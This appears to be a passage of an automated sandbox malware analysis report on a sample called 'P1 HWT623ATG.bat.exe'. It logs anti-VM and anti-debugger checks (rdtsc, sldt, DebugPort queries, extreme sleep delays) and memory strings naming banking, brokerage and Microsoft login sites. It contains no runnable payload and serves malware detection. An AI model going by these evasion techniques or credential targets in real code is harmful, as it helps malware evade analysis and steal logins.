Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: P1 HWT623ATG.bat.exe PID: 5064, type: MEMORYSTR

Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Memory allocated: 2FA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Memory allocated: 30E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Memory allocated: 50E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Memory allocated: 9140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Memory allocated: A140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Memory allocated: A440000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Memory allocated: B440000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Memory allocated: 2360000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Memory allocated: 24F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Memory allocated: 44F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Memory allocated: 8490000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Memory allocated: 9490000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Memory allocated: 8490000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe

Code function: 9_2_0127096E rdtsc

9_2_0127096E

Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe

Code function: 1_2_064C1B22 sldt word ptr [eax]

1_2_064C1B22

Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6241	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8287	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Window / User API: threadDelayed 9823
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8573
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 809

Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	API coverage: 0.7 %
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	API coverage: 0.2 %

Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe TID: 4128	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6640	Thread sleep count: 6241 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2848	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3820	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2312	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7068	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe TID: 2064	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe TID: 7712	Thread sleep count: 149 > 30
Source: C:\Windows\SysWOW64\compact.exe TID: 7712	Thread sleep time: -298000s >= -30000s
Source: C:\Windows\SysWOW64\compact.exe TID: 7712	Thread sleep count: 9823 > 30
Source: C:\Windows\SysWOW64\compact.exe TID: 7712	Thread sleep time: -19646000s >= -30000s
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe TID: 7744	Thread sleep time: -80000s >= -30000s
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe TID: 7744	Thread sleep count: 33 > 30
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe TID: 7744	Thread sleep time: -49500s >= -30000s
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe TID: 7744	Thread sleep count: 40 > 30
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe TID: 7744	Thread sleep time: -40000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5908	Thread sleep time: -7378697629483816s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: 66159w4.26.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: 66159w4.26.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: 66159w4.26.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: 66159w4.26.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: 66159w4.26.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: 66159w4.26.dr	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: 66159w4.26.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: 66159w4.26.dr	Binary or memory string: AMC password management pageVMware20,11696492231
Source: 66159w4.26.dr	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: 66159w4.26.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: compact.exe, 0000001A.00000002.3724699331.00000000082E1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 66159w4.26.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: 66159w4.26.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: 66159w4.26.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: 66159w4.26.dr	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: compact.exe, 0000001A.00000002.3711399927.00000000034ED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`
Source: 66159w4.26.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: 66159w4.26.dr	Binary or memory string: discord.comVMware20,11696492231f
Source: firefox.exe, 0000001E.00000002.1923144444.0000019C0DB8C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 66159w4.26.dr	Binary or memory string: global block list test formVMware20,11696492231
Source: hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3718906371.0000000000E2F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll;
Source: 66159w4.26.dr	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: 66159w4.26.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: 66159w4.26.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: 66159w4.26.dr	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: 66159w4.26.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: 66159w4.26.dr	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: 66159w4.26.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: compact.exe, 0000001A.00000002.3724699331.0000000008305000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: 66159w4.26.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: 66159w4.26.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: 66159w4.26.dr	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: 66159w4.26.dr	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: 66159w4.26.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: 66159w4.26.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: 66159w4.26.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe

Code function: 9_2_0127096E rdtsc

9_2_0127096E

Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe

Code function: 9_2_00417933 LdrLoadDll,

9_2_00417933

Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01260124 mov eax, dword ptr fs:[00000030h]	9_2_01260124
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012DE10E mov eax, dword ptr fs:[00000030h]	9_2_012DE10E
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012DE10E mov ecx, dword ptr fs:[00000030h]	9_2_012DE10E
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012DE10E mov eax, dword ptr fs:[00000030h]	9_2_012DE10E
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012DE10E mov eax, dword ptr fs:[00000030h]	9_2_012DE10E
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012DE10E mov ecx, dword ptr fs:[00000030h]	9_2_012DE10E
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012DE10E mov eax, dword ptr fs:[00000030h]	9_2_012DE10E
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012DE10E mov eax, dword ptr fs:[00000030h]	9_2_012DE10E
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012DE10E mov ecx, dword ptr fs:[00000030h]	9_2_012DE10E
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012DE10E mov eax, dword ptr fs:[00000030h]	9_2_012DE10E
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012DE10E mov ecx, dword ptr fs:[00000030h]	9_2_012DE10E
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012DA118 mov ecx, dword ptr fs:[00000030h]	9_2_012DA118
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012DA118 mov eax, dword ptr fs:[00000030h]	9_2_012DA118
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012DA118 mov eax, dword ptr fs:[00000030h]	9_2_012DA118
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012DA118 mov eax, dword ptr fs:[00000030h]	9_2_012DA118
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012F0115 mov eax, dword ptr fs:[00000030h]	9_2_012F0115
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01304164 mov eax, dword ptr fs:[00000030h]	9_2_01304164
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01304164 mov eax, dword ptr fs:[00000030h]	9_2_01304164
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012C4144 mov eax, dword ptr fs:[00000030h]	9_2_012C4144
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012C4144 mov eax, dword ptr fs:[00000030h]	9_2_012C4144
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012C4144 mov ecx, dword ptr fs:[00000030h]	9_2_012C4144
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012C4144 mov eax, dword ptr fs:[00000030h]	9_2_012C4144
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012C4144 mov eax, dword ptr fs:[00000030h]	9_2_012C4144
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0122C156 mov eax, dword ptr fs:[00000030h]	9_2_0122C156
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012C8158 mov eax, dword ptr fs:[00000030h]	9_2_012C8158
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01236154 mov eax, dword ptr fs:[00000030h]	9_2_01236154
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01236154 mov eax, dword ptr fs:[00000030h]	9_2_01236154
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01270185 mov eax, dword ptr fs:[00000030h]	9_2_01270185
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012EC188 mov eax, dword ptr fs:[00000030h]	9_2_012EC188
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012EC188 mov eax, dword ptr fs:[00000030h]	9_2_012EC188
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012D4180 mov eax, dword ptr fs:[00000030h]	9_2_012D4180
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012D4180 mov eax, dword ptr fs:[00000030h]	9_2_012D4180
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B019F mov eax, dword ptr fs:[00000030h]	9_2_012B019F
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B019F mov eax, dword ptr fs:[00000030h]	9_2_012B019F
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B019F mov eax, dword ptr fs:[00000030h]	9_2_012B019F
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B019F mov eax, dword ptr fs:[00000030h]	9_2_012B019F
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0122A197 mov eax, dword ptr fs:[00000030h]	9_2_0122A197
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0122A197 mov eax, dword ptr fs:[00000030h]	9_2_0122A197
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0122A197 mov eax, dword ptr fs:[00000030h]	9_2_0122A197
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_013061E5 mov eax, dword ptr fs:[00000030h]	9_2_013061E5
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012601F8 mov eax, dword ptr fs:[00000030h]	9_2_012601F8
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012F61C3 mov eax, dword ptr fs:[00000030h]	9_2_012F61C3
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012F61C3 mov eax, dword ptr fs:[00000030h]	9_2_012F61C3
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012AE1D0 mov eax, dword ptr fs:[00000030h]	9_2_012AE1D0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012AE1D0 mov eax, dword ptr fs:[00000030h]	9_2_012AE1D0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012AE1D0 mov ecx, dword ptr fs:[00000030h]	9_2_012AE1D0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012AE1D0 mov eax, dword ptr fs:[00000030h]	9_2_012AE1D0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012AE1D0 mov eax, dword ptr fs:[00000030h]	9_2_012AE1D0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0122A020 mov eax, dword ptr fs:[00000030h]	9_2_0122A020
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0122C020 mov eax, dword ptr fs:[00000030h]	9_2_0122C020
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012C6030 mov eax, dword ptr fs:[00000030h]	9_2_012C6030
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B4000 mov ecx, dword ptr fs:[00000030h]	9_2_012B4000
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012D2000 mov eax, dword ptr fs:[00000030h]	9_2_012D2000
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012D2000 mov eax, dword ptr fs:[00000030h]	9_2_012D2000
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012D2000 mov eax, dword ptr fs:[00000030h]	9_2_012D2000
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012D2000 mov eax, dword ptr fs:[00000030h]	9_2_012D2000
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012D2000 mov eax, dword ptr fs:[00000030h]	9_2_012D2000
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012D2000 mov eax, dword ptr fs:[00000030h]	9_2_012D2000
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012D2000 mov eax, dword ptr fs:[00000030h]	9_2_012D2000
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012D2000 mov eax, dword ptr fs:[00000030h]	9_2_012D2000
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0124E016 mov eax, dword ptr fs:[00000030h]	9_2_0124E016
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0124E016 mov eax, dword ptr fs:[00000030h]	9_2_0124E016
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0124E016 mov eax, dword ptr fs:[00000030h]	9_2_0124E016
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0124E016 mov eax, dword ptr fs:[00000030h]	9_2_0124E016
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0125C073 mov eax, dword ptr fs:[00000030h]	9_2_0125C073
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01232050 mov eax, dword ptr fs:[00000030h]	9_2_01232050
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B6050 mov eax, dword ptr fs:[00000030h]	9_2_012B6050
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012C80A8 mov eax, dword ptr fs:[00000030h]	9_2_012C80A8
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012F60B8 mov eax, dword ptr fs:[00000030h]	9_2_012F60B8
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012F60B8 mov ecx, dword ptr fs:[00000030h]	9_2_012F60B8
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0123208A mov eax, dword ptr fs:[00000030h]	9_2_0123208A
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0122A0E3 mov ecx, dword ptr fs:[00000030h]	9_2_0122A0E3
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012380E9 mov eax, dword ptr fs:[00000030h]	9_2_012380E9
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B60E0 mov eax, dword ptr fs:[00000030h]	9_2_012B60E0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0122C0F0 mov eax, dword ptr fs:[00000030h]	9_2_0122C0F0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012720F0 mov ecx, dword ptr fs:[00000030h]	9_2_012720F0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B20DE mov eax, dword ptr fs:[00000030h]	9_2_012B20DE
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126A30B mov eax, dword ptr fs:[00000030h]	9_2_0126A30B
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126A30B mov eax, dword ptr fs:[00000030h]	9_2_0126A30B
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126A30B mov eax, dword ptr fs:[00000030h]	9_2_0126A30B
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0122C310 mov ecx, dword ptr fs:[00000030h]	9_2_0122C310
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01250310 mov ecx, dword ptr fs:[00000030h]	9_2_01250310
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012D437C mov eax, dword ptr fs:[00000030h]	9_2_012D437C
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B2349 mov eax, dword ptr fs:[00000030h]	9_2_012B2349
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B2349 mov eax, dword ptr fs:[00000030h]	9_2_012B2349
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B2349 mov eax, dword ptr fs:[00000030h]	9_2_012B2349
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B2349 mov eax, dword ptr fs:[00000030h]	9_2_012B2349
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B2349 mov eax, dword ptr fs:[00000030h]	9_2_012B2349
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B2349 mov eax, dword ptr fs:[00000030h]	9_2_012B2349
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B2349 mov eax, dword ptr fs:[00000030h]	9_2_012B2349
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B2349 mov eax, dword ptr fs:[00000030h]	9_2_012B2349
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B2349 mov eax, dword ptr fs:[00000030h]	9_2_012B2349
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B2349 mov eax, dword ptr fs:[00000030h]	9_2_012B2349
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B2349 mov eax, dword ptr fs:[00000030h]	9_2_012B2349
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B2349 mov eax, dword ptr fs:[00000030h]	9_2_012B2349
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B2349 mov eax, dword ptr fs:[00000030h]	9_2_012B2349
